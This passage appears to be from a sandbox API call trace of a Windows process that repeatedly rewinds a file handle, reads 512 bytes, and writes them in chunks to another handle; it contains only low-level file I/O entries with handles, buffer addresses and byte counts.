hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.808] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.809] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.810] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.810] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.811] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.811] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.813] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.813] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.814] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.814] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.816] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.816] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.817] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.817] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.819] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: 